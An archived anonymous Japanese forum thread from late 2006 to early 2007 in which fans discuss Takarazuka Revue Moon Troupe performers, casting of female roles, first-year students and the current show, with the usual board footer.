137 :名無しさん@花束いっぱい。:2006/12/28(木) 22:27:14 ID:nNALo7Hu
またあいあい〜〜・・・飽きたよ。


138 :名無しさん@花束いっぱい。:2006/12/28(木) 22:34:29 ID:+j7nTb1e
愛しき人では霧やんが体調悪かったから今度は元気になった霧やんとあいあいの
芝居が見たいんですが。少数派みたいだね。
スカステで稽古風景での霧あいのダンスイイ感じだったし。

139 :名無しさん@花束いっぱい。:2006/12/28(木) 23:03:26 ID:r0etCe3Y
あいあいは一度も美人だとは思ったことはない。
新公ヒロインも当時のえみくらより酷かったから選ばれたとしか思えないし。

声は素敵だから、化粧により一層の工夫を
ガンガレ

140 :名無しさん@花束いっぱい。:2006/12/28(木) 23:29:44 ID:R9TUGOo7
>>127GSって何だったっけ?ど忘れスマソ

141 :名無しさん@花束いっぱい。:2006/12/28(木) 23:45:22 ID:iNbpYA2x
>>140
>>127タンじゃないけど、「ゴールデン・ステップス」(羽山先生ダンスコン)
コットンクラブのグルッと宙返りするみたいリフトの話だとオモ。

142 :名無しさん@花束いっぱい。:2006/12/29(金) 05:37:56 ID:wXVFV2QU
私もチビッコみっぽーが好きだ。
ショーで活躍させてくれんかね。

143 :名無しさん@花束いっぱい。:2006/12/29(金) 09:01:08 ID:u51HpCso
今回の公演は研1さんはお芝居、ショーどちらも出番は多いですか?
今回が組配属されて初めての公演ですよね?目立っている方はいらっしゃるのでしょうか?
名前があまり挙がってない方で・・

144 :名無しさん@花束いっぱい:2006/12/29(金) 09:38:25 ID:xmN/ANpF
>143
阪急初詣ポスターモデルの蘭乃はながショーのダレンリーの公開稽古
で話題になってました。


145 :名無しさん@花束いっぱい。:2006/12/29(金) 09:47:57 ID:/8bK2EFY
蘭乃さん、路線なんだねー。生で見たらイケてるのかなぁ。
花純風香か昔、星にいたコケシちゃんにそっくりなんだけど。
トータルでみたらいいんだろうね。

146 :名無しさん@花束いっぱい。:2006/12/29(金) 09:51:04 ID:xmN/ANpF
蘭乃さんって花總さん系の顔だから劇団の好みかと。

147 :名無しさん@花束いっぱい。:2006/12/29(金) 10:05:23 ID:EZes1rwe
↑草加でしょ

148 :名無しさん@花束いっぱい。:2006/12/29(金) 10:08:04 ID:+w3lR4QA
双子だしどちらも均等に使ってきそう。

149 :名無しさん@花束いっぱい。:2006/12/29(金) 11:06:39 ID:dL8v+UNy
蘭乃は次の新公ヒロインに抜擢されたら凄いよね。

150 :名無しさん@花束いっぱい。:2006/12/30(土) 11:52:24 ID:E0h2nRg1
それ、エミクラっぽくてちょっとやだ。

151 :名無しさん@花束いっぱい。:2006/12/30(土) 12:00:53 ID:nvimD26a
研1って今回が初舞台以来の公演参加?暁のローマは東京出てなかった?

152 :名無しさん@花束いっぱい。:2007/01/01(月) 10:34:55 ID:cqw7asfX
>148
宙の鈴奈さんも双子だけど、使われ方も成績も全然違ってた妹さん(?)は
とっくに辞めちゃってます。

153 :名無しさん@花束いっぱい。:2007/01/01(月) 17:03:39 ID:4TBFwZAS
美人だけど成績イマイチな妹は、あまり印象に残る役が無かったなぁ。
外見…だけど歌という武器があった沙也姉さんは研一から影ソロとかやってた。

154 :名無しさん@花束いっぱい。:2007/01/01(月) 21:21:15 ID:dv+38Z9P
今回退団の、フジコはどうですか?

155 :名無しさん@花束いっぱい。:2007/01/02(火) 16:33:43 ID:5pH7ENSU
>154
ロケットのところのソロのダンスは時間も長くてよかったよ。

156 :名無しさん@花束いっぱい。:2007/01/02(火) 21:01:12 ID:pWOb7z1g
憧花ゆりのちゃん。
入団当初から、スタイル良くて成績よくて、可愛いな、って思ってました。
でも、同期の城咲あいちゃんばっかりが抜擢され・・・
あと、なぜか、同期で同じ娘役の青葉みちるって方のほうが、プログラムの写真が、大きくなるのも早く・・

もどかしかったです。

だから、今回のエトワールは、嬉しいかぎり!
ごらんになられた方、どうでしたか??


157 :名無しさん@花束いっぱい。:2007/01/03(水) 02:16:19 ID:1mBWSqFg
あげ!

158 :名無しさん@花束いっぱい。:2007/01/03(水) 14:41:41 ID:85/PVgTk
>156
エトワール 良かったですよー。どこかの場面で
一人だけ黒髪のカツラをかぶっていて、目立ってました。
ただ、芝居の方は娘役は役らしい役はついてない。
あいあいでさえその他大勢でびっくりした。

159 :名無しさん@花束いっぱい。:2007/01/03(水) 15:37:08 ID:l17mF7pY
公演中なのにレス少ないのであげ

月組は昔から娘役はあんましいい役つかない感じ。
例えばよしこの時の風花ちゃんとか、
風花ちゃんのときのほさちとか、
2番手娘役の地位なのに、芝居ではその他大勢だった。
檀ちゃんとかエミクラとか、トップとして実力あやふやな人がなると
周りが支えなくちゃならないから、
多少使われるけどね。


160 :名無しさん@花束いっぱい。:2007/01/03(水) 21:06:58 ID:lxga0huu
158さん、ご親切にありがとうございました(^^)
早速今日、観にいってきました。
確かに、役が少ないですね・・
もっともっと、若手の方に、活躍の場を、と思います。

今日は、憧花ゆりのさん、ショーの落ち着いた場面でこけてらっしゃって。。
みていて焦りました。(^^:)

161 :名無しさん@花束いっぱい。:2007/01/03(水) 23:34:59 ID:+neVKCld
エミクラちゃんの時はそれこそ氷河期だったような…。女性の良い役がないならともかく、あるのにその役はお姉様か男役の女役ばかりに当てられた…。ほさちさんは下級生で娘1就任だから、 2番手は無いに等しくて当然だと思う。彩音ちゃんやエミクラちゃんもなかった。

162 :名無しさん@花束いっぱい。:2007/01/04(木) 01:09:43 ID:LzUNo+Nj
別に学年と二番手の有無は関係ないんじゃ?
彩音はまだこれから先、分からないし
えみくらん時はるい・あいで分け合っていた感じ。
同じく就任の早かったお花には優里ちゃんがいたし…。

163 :名無しさん@花束いっぱい。:2007/01/04(木) 11:34:03 ID:Swj3aRRV
意味が違う。彩音ちゃんやエミクラちゃんなど下級生で娘1に就任した娘役は、ほぼ二番手時代はないし、大劇場の芝居で大きな役が余り付かないうちに就任するって書いたんだけど? ほさちが二番手時代に役付き悪かった、と書いてあるから。ほさちさんも下級生就任。

164 :名無しさん@花束いっぱい。:2007/01/04(木) 12:13:48 ID:LzUNo+Nj
そりゃあんた、文章力不足だわw
161の書き方じゃ「二番手“時代”」の話かどうか分からん
もしかして「二番手時代」のことかなぁ、と思わなくもないけど、
前半と後半で、話の中心がズレてるもの

165 :名無しさん@花束いっぱい。:2007/01/04(木) 12:30:58 ID:eWOu6qZQ
私も2番手時代は、トップの「上げ方の技術」を盗んだもんだ・・・

166 :名無しさん@花束いっぱい。:2007/01/04(木) 13:52:31 ID:4/LyJXvs
>トップの「上げ方の技術」を盗んだもんだ・・・

檀きっきから盗むよりも落下傘を選んだんだね。>えみくら




167 :名無しさん@花束いっぱい。:2007/01/04(木) 16:22:59 ID:2ZDeBJ21
みっぽーちゃんはどうですか??

168 :名無しさん@花束いっぱい。:2007/01/04(木) 20:56:03 ID:pR/eBPF0
>>167
よかばいw

169 :名無しさん@花束いっぱい。:2007/01/04(木) 21:25:07 ID:F8OfkRJj
>167
そのかとガチンコ勝負!?じゃないけど、
相乗効果?でめっちゃカッコ良かったよ




170 :名無しさん@花束いっぱい。:2007/01/04(木) 22:02:24 ID:9xvY4OQl
>>159
ほさちは違うよ。
まだ研3だったのに風花のお披露目で、はっきりと2番手の役。
その次の公演もそうだった。その後はすぐ組替で花でトップ娘役
となりました。
風花は本公演では、芝居ではいい役が案外ついてなかったが
ショーでは使われてた。佳子のというより天海になってからだけど。

171 :名無しさん@花束いっぱい。:2007/01/05(金) 16:50:08 ID:LrR/KfA1
蘭乃はなさん、ウィッグとれて
最後まで手にもって踊ってました。
初々しくて可愛いし、ポジションもとても優遇されてるのだけど
いつもニコニコした同じ笑顔。
大人っぽい雰囲気な場面でも彼女だけニコニコしすぎで浮いている。




172 :名無しさん@花束いっぱい。:2007/01/06(土) 18:00:12 ID:Wr4J2Mbk
ヨシコ時代のユウコと
ユウコ時代のほさちは役付きよかったよ?

カナメ&ヨシコ時代のユウコはまだ研2〜3あたりだから
芝居では役はついてなかったけど、
ショーや芝居でも役名はなくとも目立つ場所にちゃんと配置されてた。
ゆり&ヨシコ時代になってからは完全2番手扱い。
その間、新公&バウヒロイン多数。

ほさちはのん&ゆうこのお披露目「CANCAN」でもすでに2番手扱い。
次の「チェーザレボルジア」でも2番手だったし、
ショーでも2番手だったマミと1場面芯でもらってたし、
その後花異動になって2番手扱いは2作品だけだから
少なく感じるだろうけど、完全2番手だった。
新公&バウヒロイン。



173 :名無しさん@花束いっぱい。:2007/01/06(土) 20:54:33 ID:5x+OCC1A
そうなんだよね・・・私も気になった蘭ちゃん。
研1だし技術が伴わないのは仕方がないけど、あのいつも同じ顔で踊る
のは癖になる前にやめた方がいいと思う。
ああいう踊り方してると周りから浮いてしまって本人のために良くないです。


174 :名無しさん@花束いっぱい。:2007/01/06(土) 22:59:12 ID:ZN02QS1w
>>169
ガチンコの詳しい内容を教えて下さい

175 :名無しさん@花束いっぱい。:2007/01/07(日) 21:11:13 ID:pZHmpnyf
今回の公演ねねとれみどちらが目だってますか?

176 :名無しさん@花束いっぱい。:2007/01/07(日) 23:55:12 ID:eFAKdjk2
劇は、どっちもどっち・・

ショーは、人形役とエトワールやったってことで、れみちゃんかな・・・
でも、ねねちゃんも、かなみちゃん、あいあいと、3人口で踊ってるし・・・
私の目からはどっちもどっちに見えた

でも、新人公演ねねちゃん主役だから、今回は、ねねちゃんかな?





177 :名無しさん@花束いっぱい。:2007/01/08(月) 09:55:32 ID:WIsgtiNJ
>175さんありがとう!
れみの人形役かわいいでしょうね。まさきとマギーと絡むのですか?



178 :名無しさん@花束いっぱい。:2007/01/08(月) 13:09:35 ID:hjS8KDR7
ねねは、宙に行ってもらって、
月は、かなみ→あいあい→れみで御願いします。
多数派の意見です。

179 :名無しさん@花束いっぱい。:2007/01/08(月) 13:35:41 ID:WIsgtiNJ
でも、れみは星に異動されるんだよね・・・

180 :名無しさん@花束いっぱい。:2007/01/08(月) 15:51:29 ID:6YEqy/fr
>178
れみファンであろう、あなたの周りだけでの多数派意見と言われても…w

181 :名無しさん@花束いっぱい。:2007/01/08(月) 16:08:44 ID:yFIdl+N5
かなみ→あいあい→れみになる前に、れみの位置に他の子がきそう。
前に何回かでてたけど、れみは雪が合いそう。

ねねは月が合うけど、体格が立派すぎて男役が華奢に見えてバランス悪い。

182 :名無しさん@花束いっぱい。:2007/01/08(月) 16:35:01 ID:rfb0FBUB
私もねねちゃんは月ではちょっとでかすぎだとオモ。



183 :177さんへ:2007/01/08(月) 18:07:33 ID:oYhrErKb
そうですね、3人で、踊ってはります。操り人形の役で、独特の動きをしていました。
可愛かったですよ(^^)

184 :名無しさん@花束いっぱい。:2007/01/08(月) 19:33:23 ID:CZBoorkK
ねね宙いらね!!

185 :名無しさん@花束いっぱい。:2007/01/08(月) 20:21:46 ID:sfB3EKGw
私も、ねねちゃんは、上げすぎだと思う・・・

186 :名無しさん@花束いっぱい。:2007/01/11(木) 00:27:12 ID:SyojKVoL
公演の感想どんどんお願いします!
ショーは娘役がけっこう活躍してるそうですね☆

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)